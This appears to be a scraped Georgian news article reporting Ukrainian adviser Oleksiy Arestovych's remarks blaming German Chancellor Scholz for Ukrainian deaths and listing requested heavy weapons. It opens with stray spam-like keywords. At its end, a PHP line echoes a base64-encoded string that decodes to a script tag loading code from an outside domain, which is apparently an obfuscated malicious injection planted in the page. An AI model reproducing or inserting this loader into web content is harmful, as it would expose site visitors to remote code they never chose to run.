celsiusi
ავერსი საქკაბელი
ბატონო შოლც, თქვენ ხართ პასუხისმგებელი ჩვენი ჯარისკაცების და მშვიდობიანი მოსახლეობის დაღუპვაზე, – უკრაინული მედიის ცნობით, აღნიშნულის შესახებ უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩეველმა, ალექსეი არესტოვიჩმა გერმანულ მედიასთან ინტერვიუში განაცხადა.
 
პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩეველს კითხვა დაუსვეს, თუ რას ეტყოდა ის გერმანიის კანცლერს, ოლაფ შოლცს რომ შეხვედროდა.
 
„ბატონო შოლც, თქვენ ხართ პასუხისმგებელი ჩვენი ჯარისკაცების და მშვიდობიანი მოსახლეობის დაღუპვაზე, ყოველდღე იღუპებიან ბავშვები, ჩვენ ყოველდღიურად ვკარგავთ 100 ჯარისკაცს, რადგან თქვენ არ გვაძლევთ მძიმე იარაღს. უკრაინის არმია ძლიერია, ჩვენ შევძლებდით რუსების დამარცხებას და ჩვენი ქვეყნიდან განდევნას, მაგრამ ჩვენ გვჭირდება იარაღი“, – განაცხადა არესტოვიჩმა.
 
არესტოვიჩმა დააზუსტა, რომ უკრაინას გერმანიისგან სჭირდება შორი მანძილის არტილერია, ზალპური ცეცხლის სისტემები, ტანკები, ჯავშანტრასპორტები და უპილოტო საფრენი აპარატები, მათ შორის 88 ერთეული leopard-ის ტიპის ტანკები და 50 ერთეული Gepard-ის ტიპის თვითმავალი საზენიტო დანადგარი.
 
„თუ ჩვენ საკმარისი რაოდენობა გვექნება, ომს მოვიგებთ. როდესაც დასავლეთმა მოგვცა 120 ერთეული შორი მანძილის საარტილერიო დანადგარი, სიტუაცია ფრონტზე მაშინვე შეიცვალა. სამ დღეში რუსებმა დაკარგეს თავდასხმის სიჩქარე“, – განაცხადა არესტოვიჩმა.
 
 
582
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");